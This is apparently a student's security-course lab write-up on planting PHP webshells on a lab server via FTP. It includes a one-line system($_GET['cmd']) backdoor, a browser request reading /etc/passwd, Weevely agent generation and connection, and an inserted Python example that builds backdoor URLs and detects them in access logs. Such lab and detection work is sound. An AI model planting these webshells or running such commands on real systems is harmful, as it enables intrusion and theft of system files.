Lab 8.1 ‐ Weevely ‐ Jm - Jacob-Mayotte/SEC335_Tech_Journal GitHub Wiki

Deliverable 1:

image

To do this I used the file: mayotte_backdoor3.php

image

  • ftp [user]@10.0.5.25
  • cd upload
  • lcd [path to local directory that the backdoor lives in]
  • put mayotte_backdoor3.php
  • the file should then show up in an ls on the server:

image

Then I opened a Firefox browser and visited: http://10.0.5.25/upload/mayotte_backdoor3.php?cmd=cat+/etc/passwd

image

Then I opened Wireshark with a port 80 capture filter, followed the TCP stream, and could read the command and the contents of /etc/passwd in the clear, since the backdoor is driven over plain HTTP:

image
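The following is an added worked example, not code from the original journal or the course materials. It pulls together the three things Deliverable 1 turns on: the backdoor must open with a full `<?php` tag (the pitfall discussed in the Reflection), the command is carried in the `cmd=` query parameter with spaces encoded as `+`, and because the traffic is plain HTTP the same requests are trivially visible in a Wireshark stream or in the web server's access log. The host and file name are the ones on this page; the client helper, the check, and the log lines are constructed for this example.

```python
"""Added example: cmd= PHP backdoor client, open-tag check, and access-log detector."""
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Target URL from the page (server and file name as used in Deliverable 1).
TARGET = "http://10.0.5.25/upload/mayotte_backdoor3.php"

# Minimal GET-driven command backdoor. It starts with the full "<?php" tag; a file
# that starts with a bare "<?" is only executed when short_open_tag is enabled,
# otherwise the server hands the source back as text, which is what the
# Reflection section describes.
BACKDOOR_SRC = "<?php system($_GET['cmd']); ?>\n"


def opens_with_full_php_tag(src: str) -> bool:
    """True if the PHP source begins with '<?php' (case-insensitive), so the code
    runs regardless of the server's short_open_tag setting."""
    return src.lstrip().lower().startswith("<?php")


def build_cmd_url(base: str, cmd: str) -> str:
    """Encode a shell command as the cmd= query parameter.

    urlencode() uses quote_plus, so spaces become '+', matching the URL typed by
    hand on the page (cat+/etc/passwd); '/' is kept literal via safe='/'.
    """
    return f"{base}?{urlencode({'cmd': cmd}, safe='/')}"


# Constructed Apache combined-format access-log lines (not real captured data).
LOG_LINES = [
    '10.0.5.30 - - [01/Mar/2023:10:00:01 -0500] '
    '"GET /upload/mayotte_backdoor3.php?cmd=cat+/etc/passwd HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '10.0.5.30 - - [01/Mar/2023:10:00:05 -0500] '
    '"GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.5.30 - - [01/Mar/2023:10:00:09 -0500] '
    '"GET /upload/mayotte_backdoor3.php?cmd=id HTTP/1.1" 200 40 "-" "curl/7.88.1"',
]

# Pull the request line ("GET /path HTTP/1.1") out of a combined-format entry.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/')


def find_cmd_requests(lines):
    """Return (path, decoded command) for every request carrying a cmd= parameter.

    parse_qs() turns '+' back into a space, so the operator's command is
    recovered exactly as the PHP side would see it in $_GET['cmd'].
    """
    hits = []
    for line in lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("path"))
        for cmd in parse_qs(parts.query).get("cmd", []):
            hits.append((parts.path, cmd))
    return hits


if __name__ == "__main__":
    print("open tag ok:", opens_with_full_php_tag(BACKDOOR_SRC))
    print("request URL:", build_cmd_url(TARGET, "cat /etc/passwd"))
    for path, cmd in find_cmd_requests(LOG_LINES):
        print(f"backdoor request: {path} -> {cmd!r}")
```

The detector is the same signal a defender gets from Wireshark's follow-TCP-stream on port 80: nothing about this backdoor is hidden, the path and the command are both in the request line. That is the contrast with the Weevely agent in Deliverable 2, which encodes its traffic rather than passing a bare command in the query string.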

Deliverable 2: Weevely

Using Weevely I generated a PHP backdoor (agent): weevely generate guest JM_weeve.php

  • guest is the password I used; replace this with a new password
  • JM_weeve.php is the output file that Weevely generated

Then I moved back to the 10.0.5.25 server and uploaded JM_weeve.php over FTP into the upload directory (the name is case-sensitive on the server, so it must match what is used in the URL below)

image

Since the file is now on the target server, I went back to my local command line and connected to it:

weevely http://10.0.5.25/upload/JM_weeve.php guest

  • guest is the password chosen at generation time
  • /upload/JM_weeve.php is the path where the file resides under the web root (the FTP upload directory is served by the web server)

image

I then ran id and whoami and received the expected output

Deliverable 3:

image

Reflection:

I ran into a hiccup in part 1. I was trying to run the cat+/etc/passwd on 10.0.5.25 but kept receiving the file contents of mayotte_backdoor rather than the file actually executing.

The file:

image

The issue was that I was missing php after the <? at the start of the file. Once I changed this and re-ran the file, it worked.